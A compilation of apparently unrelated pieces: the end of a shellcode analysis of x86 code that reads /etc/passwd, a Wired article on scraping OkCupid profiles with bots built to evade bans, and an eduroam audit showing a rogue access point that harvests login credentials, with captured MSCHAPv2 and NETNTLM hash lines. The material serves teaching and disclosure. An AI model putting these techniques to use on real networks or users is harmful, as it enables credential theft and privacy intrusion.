00000020  B804000000  mov eax,0x4
00000025  BB01000000  mov ebx,0x1
0000002A  CD80        int 0x80
0000002C  B801000000  mov eax,0x1
00000031  BB00000000  mov ebx,0x0
00000036  CD80        int 0x80
00000038  E8C5FFFFFF  call dword 0x2
0000003D  2F          das
0000003E  657463      gs jz 0xa4
00000041  2F          das
00000042  7061        jo 0xa5
00000044  7373        jnc 0xb9
00000046  7764        ja 0xac
00000048  00          db 0x00

Libemu and sctest did not work for me, so I will only look at the disassembly and the debugger. First things first: the shellcode uses the JMP-CALL-POP technique. This can be seen clearly by stepping through the code, but also by looking at the disassembly.

00000000  EB36        jmp short 0x38

Jump to address 0x38.
00000038  E8C5FFFFFF  call dword 0x2
0000003D  2F          das
0000003E  657463      gs jz 0xa4
00000041  2F          das
00000042  7061        jo 0xa5
00000044  7373        jnc 0xb9
00000046  7764        ja 0xac
00000048  00          db 0x00

Call 0x2. Be aware that 0x3D-0x48 is a data section: it holds nothing but the path "/etc/passwd", and the call pushes its address onto the stack as the return address.

00000002  B805000000  mov eax,0x5
00000007  5B          pop ebx
00000008  31C9        xor ecx,ecx
0000000A  CD80        int 0x80

Move 5 into EAX for syscall 5, which is open(). Pop the address of "/etc/passwd" into EBX and execute. The file descriptor (for example 3) is returned in EAX.

0000000C  89C3        mov ebx,eax
0000000E  B803000000  mov eax,0x3
00000013  89E7        mov edi,esp
00000015  89F9        mov ecx,edi
00000017  BA00100000  mov edx,0x1000
0000001C  CD80        int 0x80

Here the syscall for read() is executed: EAX is set to 3 (the read() syscall number) and EBX holds the file descriptor returned by open(). ECX points to the buffer on the stack (via EDI), and EDX, the read size, is set to 0x1000.

0000001E  89C2        mov edx,eax
00000020  B804000000  mov eax,0x4
00000025  BB01000000  mov ebx,0x1
0000002A  CD80        int 0x80

Finally the result is written (syscall 4 is write()) to standard output.

0000002C  B801000000  mov eax,0x1
00000031  BB00000000  mov ebx,0x0
00000036  CD80        int 0x80

And exit. So that was it for the last analysis. This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification: Assembly Language and Shellcoding on Linux
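For reference, the four syscalls of the read_file shellcode map directly onto Python's os module. A minimal equivalent (my sketch, not part of the original post):

```python
import os

def read_file(path: str, chunk: int = 0x1000) -> bytes:
    """Mirror the shellcode: open(2), read(2) up to 0x1000 bytes,
    write(2) the result to stdout. exit(2) is left to the interpreter."""
    fd = os.open(path, os.O_RDONLY)   # syscall 5: open(path, O_RDONLY)
    data = os.read(fd, chunk)         # syscall 3: read(fd, buf, 0x1000)
    os.write(1, data)                 # syscall 4: write to fd 1 (stdout)
    os.close(fd)
    return data

read_file("/etc/passwd")
```

Like the shellcode, this prints at most 0x1000 bytes of the file, since there is no read loop.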
  24. How a Math Genius Hacked OkCupid to Find True Love
By Kevin Poulsen, 01.21.14, 6:30 AM

Mathematician Chris McKinlay hacked OkCupid to find the girl of his dreams. (Photo: Emily Shur)

Chris McKinlay was folded into a cramped fifth-floor cubicle in UCLA’s math sciences building, lit by a single bulb and the glow from his monitor. It was 3 in the morning, the optimal time to squeeze cycles out of the supercomputer in Colorado that he was using for his PhD dissertation. (The subject: large-scale data processing and parallel numerical methods.) While the computer chugged, he clicked open a second window to check his OkCupid inbox.

McKinlay, a lanky 35-year-old with tousled hair, was one of about 40 million Americans looking for romance through websites like Match.com, J-Date, and e-Harmony, and he’d been searching in vain since his last breakup nine months earlier. He’d sent dozens of cutesy introductory messages to women touted as potential matches by OkCupid’s algorithms. Most were ignored; he’d gone on a total of six first dates.

On that early morning in June 2012, his compiler crunching out machine code in one window, his forlorn dating profile sitting idle in the other, it dawned on him that he was doing it wrong. He’d been approaching online matchmaking like any other user. Instead, he realized, he should be dating like a mathematician.

OkCupid was founded by Harvard math majors in 2004, and it first caught daters’ attention because of its computational approach to matchmaking. Members answer droves of multiple-choice survey questions on everything from politics, religion, and family to love, sex, and smartphones.
On average, respondents select 350 questions from a pool of thousands—“Which of the following is most likely to draw you to a movie?” or “How important is religion/God in your life?” For each, the user records an answer, specifies which responses they’d find acceptable in a mate, and rates how important the question is to them on a five-point scale from “irrelevant” to “mandatory.” OkCupid’s matching engine uses that data to calculate a couple’s compatibility. The closer to 100 percent—mathematical soul mate—the better.

But mathematically, McKinlay’s compatibility with women in Los Angeles was abysmal. OkCupid’s algorithms use only the questions that both potential matches decide to answer, and the match questions McKinlay had chosen—more or less at random—had proven unpopular. When he scrolled through his matches, fewer than 100 women would appear above the 90 percent compatibility mark. And that was in a city containing some 2 million women (approximately 80,000 of them on OkCupid). On a site where compatibility equals visibility, he was practically a ghost.

He realized he’d have to boost that number. If, through statistical sampling, McKinlay could ascertain which questions mattered to the kind of women he liked, he could construct a new profile that honestly answered those questions and ignored the rest. He could match every woman in LA who might be right for him, and none that weren’t.

Chris McKinlay used Python scripts to riffle through hundreds of OkCupid survey questions. He then sorted female daters into seven clusters, like “Diverse” and “Mindful,” each with distinct characteristics. (Photo: Mauricio Alejo)

Even for a mathematician, McKinlay is unusual. Raised in a Boston suburb, he graduated from Middlebury College in 2001 with a degree in Chinese. In August of that year he took a part-time job in New York translating Chinese into English for a company on the 91st floor of the north tower of the World Trade Center. The towers fell five weeks later.
(McKinlay wasn’t due at the office until 2 o’clock that day. He was asleep when the first plane hit the north tower at 8:46 am.) “After that I asked myself what I really wanted to be doing,” he says. A friend at Columbia recruited him into an offshoot of MIT’s famed professional blackjack team, and he spent the next few years bouncing between New York and Las Vegas, counting cards and earning up to $60,000 a year. The experience kindled his interest in applied math, ultimately inspiring him to earn a master’s and then a PhD in the field. “They were capable of using mathematics in lots of different situations,” he says. “They could see some new game—like Three Card Pai Gow Poker—then go home, write some code, and come up with a strategy to beat it.” Now he’d do the same for love.

First he’d need data. While his dissertation work continued to run on the side, he set up 12 fake OkCupid accounts and wrote a Python script to manage them. The script would search his target demographic (heterosexual and bisexual women between the ages of 25 and 45), visit their pages, and scrape their profiles for every scrap of available information: ethnicity, height, smoker or nonsmoker, astrological sign—“all that crap,” he says.

To find the survey answers, he had to do a bit of extra sleuthing. OkCupid lets users see the responses of others, but only to questions they’ve answered themselves. McKinlay set up his bots to simply answer each question randomly—he wasn’t using the dummy profiles to attract any of the women, so the answers didn’t matter—then scooped the women’s answers into a database.

McKinlay watched with satisfaction as his bots purred along. Then, after about a thousand profiles were collected, he hit his first roadblock. OkCupid has a system in place to prevent exactly this kind of data harvesting: It can spot rapid-fire use easily. One by one, his bots started getting banned. He would have to train them to act human.
He turned to his friend Sam Torrisi, a neuroscientist who’d recently taught McKinlay music theory in exchange for advanced math lessons. Torrisi was also on OkCupid, and he agreed to install spyware on his computer to monitor his use of the site. With the data in hand, McKinlay programmed his bots to simulate Torrisi’s click-rates and typing speed. He brought in a second computer from home and plugged it into the math department’s broadband line so it could run uninterrupted 24 hours a day. After three weeks he’d harvested 6 million questions and answers from 20,000 women all over the country. McKinlay’s dissertation was relegated to a side project as he dove into the data. He was already sleeping in his cubicle most nights. Now he gave up his apartment entirely and moved into the dingy beige cell, laying a thin mattress across his desk when it was time to sleep. For McKinlay’s plan to work, he’d have to find a pattern in the survey data—a way to roughly group the women according to their similarities. The breakthrough came when he coded up a modified Bell Labs algorithm called K-Modes. First used in 1998 to analyze diseased soybean crops, it takes categorical data and clumps it like the colored wax swimming in a Lava Lamp. With some fine-tuning he could adjust the viscosity of the results, thinning it into a slick or coagulating it into a single, solid glob. He played with the dial and found a natural resting point where the 20,000 women clumped into seven statistically distinct clusters based on their questions and answers. “I was ecstatic,” he says. “That was the high point of June.” He retasked his bots to gather another sample: 5,000 women in Los Angeles and San Francisco who’d logged on to OkCupid in the past month. Another pass through K-Modes confirmed that they clustered in a similar way. His statistical sampling had worked. Now he just had to decide which cluster best suited him. He checked out some profiles from each. 
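The K-Modes procedure described above can be sketched in a few lines: cluster categorical records by matching dissimilarity (the number of differing attributes), and update each cluster centre to the per-attribute mode of its members. A toy implementation of mine with invented "survey answers", not McKinlay's actual pipeline:

```python
from collections import Counter

def kmodes(rows, k, iters=10):
    """Minimal K-Modes sketch for tuples of categorical values.
    Assumes at least k distinct rows; real implementations use
    randomized initialization and a convergence test."""
    # seed the cluster modes with the first k distinct rows
    modes = []
    for row in rows:
        if row not in modes:
            modes.append(row)
        if len(modes) == k:
            break
    clusters = [[] for _ in range(k)]
    for _ in range(iters):
        # assignment step: each row joins its nearest mode
        clusters = [[] for _ in range(k)]
        for row in rows:
            dists = [sum(a != b for a, b in zip(row, m)) for m in modes]
            clusters[dists.index(min(dists))].append(row)
        # update step: new mode = per-attribute most common value
        modes = [
            tuple(Counter(col).most_common(1)[0][0] for col in zip(*members))
            if members else modes[i]
            for i, members in enumerate(clusters)
        ]
    return modes, clusters

# Two clearly distinct groups of responders:
rows = [("yes", "cats", "tea")] * 5 + [("no", "dogs", "coffee")] * 5
modes, clusters = kmodes(rows, k=2)
print(sorted(modes))               # [('no', 'dogs', 'coffee'), ('yes', 'cats', 'tea')]
print([len(c) for c in clusters])  # [5, 5]
```

The "viscosity" dial the article mentions corresponds to the choice of k (and, in fancier variants, a dissimilarity weighting): a small k coagulates everyone into a few blobs, a large k thins the data into many small clusters.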
One cluster was too young, two were too old, another was too Christian. But he lingered over a cluster dominated by women in their mid-twenties who looked like indie types, musicians and artists. This was the golden cluster. The haystack in which he’d find his needle. Somewhere within, he’d find true love. Actually, a neighboring cluster looked pretty cool too—slightly older women who held professional creative jobs, like editors and designers. He decided to go for both. He’d set up two profiles and optimize one for the A group and one for the B group.

He text-mined the two clusters to learn what interested them; teaching turned out to be a popular topic, so he wrote a bio that emphasized his work as a math professor. The important part, though, would be the survey. He picked out the 500 questions that were most popular with both clusters. He’d already decided he would fill out his answers honestly—he didn’t want to build his future relationship on a foundation of computer-generated lies. But he’d let his computer figure out how much importance to assign each question, using a machine-learning algorithm called adaptive boosting to derive the best weightings.

Source: How a Math Genius Hacked OkCupid to Find True Love - Wired Science
  25. eduroam WiFi security audit or why it is broken by design

Over Christmas I got a TP-Link TL-WN722N USB WiFi device which is supported by hostapd, and finally I could test what I always wanted to test: eduroam.

But first, what is eduroam? Eduroam is a WiFi network found at universities around the world, with the goal of providing internet access to students and university staff at every university that supports eduroam ( https://en.wikipedia.org/wiki/Eduroam ). This means I can connect to the internet with eduroam at a university in France with my user credentials from my university in Germany. Sounds good, but how does it work? The WiFi network uses WPA-Enterprise, which means you connect to an access point and the access point uses a RADIUS server to authenticate you. Generally not a bad idea. But my tests have shown that the eduroam network is broken by design.

In advance

First things first. Some of my notes from these tests can be seen here. I provide them as a "POC||GTFO", but I stripped them so they are not a step-by-step tutorial in "how to pwn eduroam".

The set-up

I configured a VM with Debian Wheezy and an installation of hostapd. I had never configured a radiusd before and wondered how I could get the user credentials when a client device authenticates to my rogue access point. Well, I found this cool project: https://github.com/brad-anton/freeradius-wpe.git. It does everything for me, and I do not have to patch the radiusd myself. But honestly, I do not entirely trust this modified radiusd, so after I configured everything I turned off the VM's internet-facing network interface to prevent the radiusd from leaking anything about my tests to the internet.

Test without a certificate modification

For my first test I just set everything up and started it. I started wpa_supplicant on my laptop and it did not connect to the rogue access point, because the certificate is wrong. OK, but what about my Android device?
I activated the WiFi on my mobile phone and ... WTF, I am connected to the rogue access point. In the log file of the rogue access point I can read my user credentials in PLAINTEXT. That is not good. But what went wrong? The certificate used by the rogue access point is still invalid.

The configuration on my Android device is completely flawed. I had configured my Android device exactly as the tutorial on my university's website said. The tutorial said that I do not have to configure any CA and should use PAP for phase 2 of the WPA-Enterprise authentication. Now you can say "Idiot, everyone can see that this is wrong!". But in my defense, I always thought that Android would then use its own installed CAs to check whether the certificate of the access point is valid. Hell, even the network-manager on Ubuntu warns you if you give no CA in the settings. And I used PAP (I knew it sends the user credentials in cleartext) because I gathered from my university's tutorials that eduroam only supports PAP for phase 2 authentication. Both assumptions were wrong.

After I installed the "Deutsche_Telekom_Root_CA_2" CA on my Android device and used it in the WiFi configuration, the device no longer connects to the rogue access point. Likewise, when the wpa_supplicant configuration is missing this line:

ca_cert="/etc/ssl/certs/Deutsche_Telekom_Root_CA_2.pem"

it also ignores the invalid certificate of the access point and just connects.

I wrote to the helpdesk of my university about the wrong tutorial for using eduroam on Android devices. The helpdesk replied that they knew about this problem with the CA, but that Android is not able to verify the certificate of the access point. This is obviously wrong. And the funny thing is, they used screenshots in their tutorial to make it easier for everyone to configure eduroam on Android devices. And on these screenshots you can see the "CA certificate" option, which is just ignored.
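For reference, a wpa_supplicant network block that pins both the CA and the expected server could look like this (a sketch of mine: identity, password, and file paths are placeholders; subject_match performs a substring match against the server certificate's subject DN):

```
network={
    ssid="eduroam"
    key_mgmt=WPA-EAP
    eap=TTLS
    phase2="auth=MSCHAPV2"
    anonymous_identity="anonymous@ruhr-uni-bochum.de"
    identity="user@ruhr-uni-bochum.de"
    password="replace-me"
    ca_cert="/etc/ssl/certs/Deutsche_Telekom_Root_CA_2.pem"
    subject_match="radius.ruhr-uni-bochum.de"
}
```

The ca_cert line alone only checks the chain; the subject_match line additionally ties the connection to one specific RADIUS server, which matters for the later tests.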
Their reply also told me some other interesting things about eduroam, which I checked in my next tests. As a summary of my first test: always configure the CA for eduroam (and in general for all WPA-Enterprise WiFi networks) and always use MSCHAPv2 instead of PAP. Even if your device connects to a rogue access point, the adversary then only gets challenge-response values and has to brute-force them. If your password is strong enough, the adversary cannot use your credentials (at least he has to spend time brute-forcing MSCHAPv2 ...).

Test with my own certificate

In the helpdesk's email reply they wrote that if the user added the CA to his WiFi settings, this would destroy the idea behind eduroam (being able to connect to every eduroam access point in the world). First I wondered about the "destroy the idea behind eduroam" part, but then I thought "They would not be so stupid, would they?". I had always assumed that the participating universities agreed to use the "Deutsche_Telekom_Root_CA_2" CA for eduroam. But this is not the case. A friend of mine was in Belgium and had to change the configured CA in his WiFi settings to connect to eduroam there. I searched through the eduroam tutorials of universities in countries other than Germany, and they all used different CAs.

Normally, the access point is configured to use a specific RADIUS server, which sends its certificate to the client (I do not know if it is even possible to use WPA-Enterprise in any other way). This means that by not agreeing on one CA for the entire eduroam infrastructure, the user must NOT configure any CA in his WiFi settings to be able to use eduroam the way it was intended. And with this, we have the first reason why eduroam is insecure by design.

The email also stated that even if the user added the CA to his WiFi configuration, this would not help: an adversary could get a certificate signed by the CA and could therefore set up a rogue access point.
This statement is true, but it holds for every public key infrastructure. With HTTPS, for example, a CA should not sign my certificate for "gmail.com" (unless I can prove that this is my domain/address). And at this point a question comes to mind. The client gets the certificate from the access point and then checks with the configured CA whether it is valid. But valid for what address? Normally the CN (common name) in the certificate is checked against the address being contacted. But against what address is the certificate provided by the RADIUS server checked?

A valid connection to the eduroam WiFi at my university with wpa_supplicant looks like this:

wlan0: Trying to associate with SSID 'eduroam'
wlan0: Associated with 00:25:45:b5:38:22
wlan0: CTRL-EVENT-EAP-STARTED EAP authentication started
wlan0: CTRL-EVENT-EAP-PROPOSED-METHOD vendor=0 method=21
wlan0: CTRL-EVENT-EAP-METHOD EAP vendor 0 method 21 (TTLS) selected
wlan0: CTRL-EVENT-EAP-PEER-CERT depth=3 subject='/C=DE/O=Deutsche Telekom AG/OU=T-TeleSec Trust Center/CN=Deutsche Telekom Root CA 2'
wlan0: CTRL-EVENT-EAP-PEER-CERT depth=2 subject='/C=DE/O=DFN-Verein/OU=DFN-PKI/CN=DFN-Verein PCA Global - G01'
wlan0: CTRL-EVENT-EAP-PEER-CERT depth=1 subject='/C=DE/ST=Nordrhein-Westfalen/L=Bochum/O=Ruhr-Universitaet Bochum/CN=Ruhr-Universitaet Bochum CA/emailAddress=rubca@ruhr-uni-bochum.de'
wlan0: CTRL-EVENT-EAP-PEER-CERT depth=0 subject='/C=DE/ST=Nordrhein-Westfalen/L=Bochum/O=Ruhr-Universitaet Bochum/CN=radius.ruhr-uni-bochum.de'
wlan0: CTRL-EVENT-EAP-SUCCESS EAP authentication completed successfully
wlan0: WPA: Key negotiation completed with 00:25:45:b5:38:22 [PTK=CCMP GTK=TKIP]
wlan0: CTRL-EVENT-CONNECTED - Connection to 00:25:45:b5:38:22 completed (auth) [id=0 id_str=]

The address given in the CN is "radius.ruhr-uni-bochum.de". But I never configured this anywhere. So in my next test I created my own CA and signed my own certificate with it.
The certificate for the rogue access point and the CA got the following values:

CA:
C=DE
ST=Some-State
O=h4des.org
CN=sqall

certificate for rogue access point:
C=DE
ST=Some-State
O=h4des.org
CN=some-rogue-access-point
emailAddress=sqall

You can see that the CN field got "some-rogue-access-point" as its value, which is not the address of any RADIUS server at all. First I tried wpa_supplicant with my newly created CA certificate in the configuration file:

ca_cert="./CA.cert.pem"

And what happened? wpa_supplicant connects to the rogue access point without any problems and discloses my user credentials as MSCHAPv2 challenge-response values. The output of wpa_supplicant shows that the radius server uses my newly created certificate:

wlan0: Trying to associate with SSID 'eduroam'
wlan0: Associated with b0:48:7a:88:fc:7a
wlan0: CTRL-EVENT-EAP-STARTED EAP authentication started
wlan0: CTRL-EVENT-EAP-PROPOSED-METHOD vendor=0 method=4 -> NAK
wlan0: CTRL-EVENT-EAP-PROPOSED-METHOD vendor=0 method=21
wlan0: CTRL-EVENT-EAP-METHOD EAP vendor 0 method 21 (TTLS) selected
wlan0: CTRL-EVENT-EAP-PEER-CERT depth=1 subject='/C=DE/ST=Some-State/O=h4des.org/CN=sqall'
wlan0: CTRL-EVENT-EAP-PEER-CERT depth=0 subject='/C=DE/ST=Some-State/O=h4des.org/CN=some-rogue-access-point/emailAddress=sqall'
EAP-TTLS: Invalid authenticator response in Phase 2 MSCHAPV2 success request

Next I tested it on my Android 4.0.4 device. I installed my own CA on the device and changed the eduroam WiFi settings to check against this CA. The device connects to the rogue access point without any problems and also discloses my user credentials.

As a summary of this test: the certificate for the rogue access point just has to be a valid certificate signed by the configured CA. It does not matter for which address the certificate was issued; it just has to be valid.
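The CA-and-certificate setup described above can be reproduced with stock OpenSSL; a sketch using the subject values from this post (the file names are mine):

```shell
# Throwaway CA with the values used in the post
openssl req -x509 -newkey rsa:2048 -nodes -days 1 \
  -keyout ca.key -out ca.pem \
  -subj "/C=DE/ST=Some-State/O=h4des.org/CN=sqall"

# Key and CSR for the rogue access point, with an arbitrary CN
openssl req -newkey rsa:2048 -nodes \
  -keyout ap.key -out ap.csr \
  -subj "/C=DE/ST=Some-State/O=h4des.org/CN=some-rogue-access-point"

# Sign the CSR with the throwaway CA
openssl x509 -req -days 1 -in ap.csr \
  -CA ca.pem -CAkey ca.key -CAcreateserial -out ap.pem

# The chain verifies even though the CN names no RADIUS server
openssl verify -CAfile ca.pem ap.pem
```

On success the last command prints "ap.pem: OK", which is exactly the property a client that checks only the CA will accept.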
Normally, the obstacle to forging a valid host in a TLS/SSL connection (such as the HTTPS example for "gmail.com" I gave earlier) is that a CA will not sign your certificate request unless you own the domain/address (or rather, the CA should not). But if any value in the CN is accepted, it is no problem at all to get a signed certificate. Here lies the second reason why eduroam is insecure by design. I do not know if the vendor offers a service to get your own certificates signed under the "Deutsche_Telekom_Root_CA_2" certificate. But normally they do. And if the vendor does, there is absolutely no problem in setting up a rogue access point which cannot be distinguished from a valid one.

It should be mentioned that the address of the RADIUS server can be configured in iDevice profiles. But I have no iDevice, so I cannot check whether the CN of the certificate provided by the RADIUS server is checked against the configured address. In wpa_supplicant, for example, I did not find any configuration option for the address of the RADIUS server, but I did find the option to match certain criteria of the accepted server certificate with "subject_match". Android 4.0.4 does not provide any such options.

Test with my own intermediate CA

After an arbitrary signed certificate was tested, the next interesting thing is a certificate signed by an intermediate CA.
When we look at the wpa_supplicant output when connecting to a benign access point:

wlan0: Trying to associate with SSID 'eduroam'
wlan0: Associated with 00:25:45:b5:38:22
wlan0: CTRL-EVENT-EAP-STARTED EAP authentication started
wlan0: CTRL-EVENT-EAP-PROPOSED-METHOD vendor=0 method=21
wlan0: CTRL-EVENT-EAP-METHOD EAP vendor 0 method 21 (TTLS) selected
wlan0: CTRL-EVENT-EAP-PEER-CERT depth=3 subject='/C=DE/O=Deutsche Telekom AG/OU=T-TeleSec Trust Center/CN=Deutsche Telekom Root CA 2'
wlan0: CTRL-EVENT-EAP-PEER-CERT depth=2 subject='/C=DE/O=DFN-Verein/OU=DFN-PKI/CN=DFN-Verein PCA Global - G01'
wlan0: CTRL-EVENT-EAP-PEER-CERT depth=1 subject='/C=DE/ST=Nordrhein-Westfalen/L=Bochum/O=Ruhr-Universitaet Bochum/CN=Ruhr-Universitaet Bochum CA/emailAddress=rubca@ruhr-uni-bochum.de'
wlan0: CTRL-EVENT-EAP-PEER-CERT depth=0 subject='/C=DE/ST=Nordrhein-Westfalen/L=Bochum/O=Ruhr-Universitaet Bochum/CN=radius.ruhr-uni-bochum.de'
wlan0: CTRL-EVENT-EAP-SUCCESS EAP authentication completed successfully
wlan0: WPA: Key negotiation completed with 00:25:45:b5:38:22 [PTK=CCMP GTK=TKIP]
wlan0: CTRL-EVENT-CONNECTED - Connection to 00:25:45:b5:38:22 completed (auth) [id=0 id_str=]

we can see that the certificate is signed by the CA of my university (and not directly by the "Deutsche_Telekom_Root_CA_2" CA). The actual chain is "Deutsche Telekom Root CA 2" -> "DFN-Verein PCA Global - G01" -> "Ruhr-Universitaet Bochum CA". So my idea at this point was: it could be difficult (and perhaps costly) to get a certificate signed by the "Deutsche_Telekom_Root_CA_2" CA, but getting a certificate signed by the university is very easy as a student or university staff member. So I created my own intermediate CA, signed by my previously created CA, and generated a new certificate for my rogue eduroam access point.
The values for all these CAs and the certificate are:

CA:
C=DE
ST=Some-State
O=h4des.org
CN=sqall

intermediate CA:
C=DE
ST=Some-Other-State
O=h4des.org
OU=intermediate
CN=it is sqall again

certificate for rogue access point:
C=DE
ST=Some-Other-State
O=h4des.org
OU=intermediate certificate
CN=again sqall

Again, wpa_supplicant is tried first. The settings are the same as in the previous test (wpa_supplicant uses the certificate of my CA to check the validity of the rogue access point). The output of wpa_supplicant shows that the rogue access point offers my new certificate signed by the intermediate CA, and that the client connects without any problems:

wlan0: Trying to associate with SSID 'eduroam'
wlan0: Associated with b0:48:7a:88:fc:7a
wlan0: CTRL-EVENT-EAP-STARTED EAP authentication started
wlan0: CTRL-EVENT-EAP-PROPOSED-METHOD vendor=0 method=4 -> NAK
wlan0: CTRL-EVENT-EAP-PROPOSED-METHOD vendor=0 method=21
wlan0: CTRL-EVENT-EAP-METHOD EAP vendor 0 method 21 (TTLS) selected
wlan0: CTRL-EVENT-EAP-PEER-CERT depth=2 subject='/C=DE/ST=Some-State/O=h4des.org/CN=sqall'
wlan0: CTRL-EVENT-EAP-PEER-CERT depth=1 subject='/C=DE/ST=Some-Other-State/O=h4des.org/OU=intermediate/CN=it is sqall again'
wlan0: CTRL-EVENT-EAP-PEER-CERT depth=0 subject='/C=DE/ST=Some-Other-State/O=h4des.org/OU=intermediate certificate/CN=again sqall'
EAP-TTLS: Invalid authenticator response in Phase 2 MSCHAPV2 success request

The log file of my modified radius server shows me the MSCHAPv2 challenge-response values:

mschap: Sat Jan 11 19:42:27 2014
username: pawlxyz@ruhr-uni-bochum.de
challenge: 43:cd:42:0f:a6:14:46:4e
response: 0d:b8:47:c0:11:a6:c9:10:a2:14:99:af:1d:15:d6:ef:4a:89:d3:95:aa:ba:2d:2b
john NETNTLM: pawlxyz@ruhr-uni-bochum.de:$NETNTLM$42cd490fa604464c$0db486c012a6c910a21379ef1d15d6ff4a89d395baba2d2c

Next I tested my Android 4.0.4 device. Like the wpa_supplicant client, it connects without any problems (because the access point is now considered valid).
As a summary for this test: the client accepts certificates that are signed by intermediate CAs. In this constellation, that is the third reason why eduroam is insecure by design. It might be difficult to get a certificate signed by the root CA, but when intermediate CAs are in place, it can be a lot easier to get a valid certificate. The "Deutsche_Telekom_Root_CA_2" CA signed the "DFN-Verein PCA Global - G01" intermediate CA, which in turn signed the CA of my university. I assume that the "DFN-Verein PCA Global - G01" intermediate CA signed a lot of university CAs, and a lot of universities (like mine) offer a service to sign your server certificate (when it is inside the namespace of the university). When you are able to get a certificate signed by any one of the CAs in the chain, you can forge a valid eduroam access point.

Test with a server certificate signed by my university

Ok, all the talk about "uhh, it is insecure with this public key infrastructure!" and "it is theoretically possible to ...": let's break it! I helped the university set up some servers, so I have access to a certificate signed by the university CA, and I configured my rogue access point to use this certificate. The certificate obviously does not have "radius.ruhr-uni-bochum.de" as its CN value; it is valid for other addresses, which I censored out. But we saw in the tests above that the value of the CN field does not matter. First I tried wpa_supplicant, now with the settings that should be used for a valid eduroam access point.
This is the output:

wlan0: Trying to associate with SSID 'eduroam'
wlan0: Associated with b0:48:7a:88:fc:7a
wlan0: CTRL-EVENT-EAP-STARTED EAP authentication started
wlan0: CTRL-EVENT-EAP-PROPOSED-METHOD vendor=0 method=4 -> NAK
wlan0: CTRL-EVENT-EAP-PROPOSED-METHOD vendor=0 method=21
wlan0: CTRL-EVENT-EAP-METHOD EAP vendor 0 method 21 (TTLS) selected
wlan0: CTRL-EVENT-EAP-PEER-CERT depth=3 subject='/C=DE/O=Deutsche Telekom AG/OU=T-TeleSec Trust Center/CN=Deutsche Telekom Root CA 2'
wlan0: CTRL-EVENT-EAP-PEER-CERT depth=2 subject='/C=DE/O=DFN-Verein/OU=DFN-PKI/CN=DFN-Verein PCA Global - G01'
wlan0: CTRL-EVENT-EAP-PEER-CERT depth=1 subject='/C=DE/ST=Nordrhein-Westfalen/L=Bochum/O=Ruhr-Universitaet Bochum/CN=Ruhr-Universitaet Bochum CA/emailAddress=rubca@ruhr-uni-bochum.de'
wlan0: CTRL-EVENT-EAP-PEER-CERT depth=0 subject='/C=DE/ST=Nordrhein-Westfalen/L=Bochum/O=Ruhr-Universitaet Bochum/OU=xxx/CN=xxx'
EAP-TTLS: Invalid authenticator response in Phase 2 MSCHAPV2 success request

We can see that the client thinks it is a valid eduroam access point. The log file of the modified radius server shows my MSCHAPv2 credentials:

mschap: Sun Jan 12 01:24:03 2014
username: pawlxyz@ruhr-uni-bochum.de
challenge: 28:f5:bf:4d:3f:fe:bf:a2
response: 7a:ab:24:87:35:82:46:40:33:73:89:5a:77:bb:ee:c0:4b:56:8b:a8:67:af:e9:94
john NETNTLM: pawlxyz@ruhr-uni-bochum.de:$NETNTLM$28f5bb4d8ffaafa2$7aab248735824641d373895a77dbeec04b568ba867afe994

The same goes for my Android 4.0.4 mobile phone. A client is not able to distinguish a benign eduroam access point from my rogue access point. A fun fact: when I had just started my rogue access point with the valid certificate, the mobile device of one of my neighbors instantly connected to it (his or her login credentials are from a different university than mine).
One has to love all the folks that have their WiFi always turned on.

Test with a client certificate signed by my university

My university offers a service that provides any student with a client certificate signed by the university's CA. My idea was: "most clients do not provide options for the radius server address, perhaps they also do not check whether the certificate is only valid for clients". Beforehand, I can tell you that wpa_supplicant and Android 4.0.4 do check this (I did not test others). I used a certificate with these key usages, signed by my university's CA:

X509v3 Key Usage: Digital Signature, Non Repudiation, Key Encipherment
X509v3 Extended Key Usage: TLS Web Client Authentication, E-mail Protection

So, when I try to connect with wpa_supplicant I get this output:

wlan0: Trying to associate with SSID 'eduroam'
wlan0: Associated with b0:48:7a:88:fc:7a
wlan0: CTRL-EVENT-EAP-STARTED EAP authentication started
wlan0: CTRL-EVENT-EAP-PROPOSED-METHOD vendor=0 method=4 -> NAK
wlan0: CTRL-EVENT-EAP-PROPOSED-METHOD vendor=0 method=21
wlan0: CTRL-EVENT-EAP-METHOD EAP vendor 0 method 21 (TTLS) selected
TLS: Certificate verification failed, error 26 (unsupported certificate purpose) depth 0 for '/C=DE/O=Ruhr-Universitaet Bochum/CN=sqall'
wlan0: CTRL-EVENT-EAP-TLS-CERT-ERROR reason=0 depth=0 subject='/C=DE/O=Ruhr-Universitaet Bochum/CN=sqall' err='unsupported certificate purpose'
SSL: SSL3 alert: write (local SSL3 detected an error):fatal:unsupported certificate
OpenSSL: openssl_handshake - SSL_connect error:14090086:SSL routines:SSL3_GET_SERVER_CERTIFICATE:certificate verify failed

We can clearly see that wpa_supplicant checks the certificate purpose. The same goes for Android 4.0.4; it just tells me "authentication error". To summarize this part: this does not have anything to do with the design or security of the eduroam network; it is purely a property of the client software implementation.
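The purpose check that wpa_supplicant performs (the "error 26" above) can be reproduced offline with OpenSSL. A sketch, using a throwaway self-signed certificate with the same client-only extended key usage (all names are invented; the -addext option needs OpenSSL 1.1.1 or newer):

```shell
# Create a throwaway certificate whose extended key usage only allows
# TLS client authentication, like the university-issued client certificate.
openssl req -x509 -newkey rsa:2048 -nodes -days 1 \
  -subj "/C=DE/O=Example/CN=client-only" \
  -addext "keyUsage=digitalSignature,keyEncipherment" \
  -addext "extendedKeyUsage=clientAuth,emailProtection" \
  -keyout client.key -out client.crt

# "SSL server : No" in this listing is the reason a client rejects such a
# certificate when a rogue access point presents it as a server certificate.
openssl x509 -in client.crt -noout -purpose | grep "SSL server"
```

Clients that skip this purpose check would accept any student's client certificate as a radius server certificate, which is why it is worth testing per client.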
I just tested it with the hope of finding a fuck-up in some WiFi clients, but was disappointed.

Conclusion

In this part I conclude my short security audit of the eduroam WiFi network. In my opinion it has a huge design flaw which cannot be fixed without changing the whole public key infrastructure. It seems to me that when the eduroam network was designed, the thinking was just: "We need some public key cryptography for eduroam. The protocol supports TLS/SSL for authentication. It is used by the internet, so let us just use it too!" Using different CAs in different countries, which have signed a lot of intermediate CAs, is not a good idea when the clients do not or cannot check the address of the radius server that presents the certificate. Every certificate signed by one of the intermediate CAs or by the top CA is valid for any client that tries to connect to the eduroam WiFi. Furthermore, the idea of eduroam was to provide a network that a client from a different country can also connect to (for example, a client from Germany could connect to an eduroam access point in Belgium). This is not possible when different top CAs are used in each country (or perhaps even within a country); or rather, it is only possible when certificates are not checked. But when they are not checked, what is the point of using TLS/SSL?

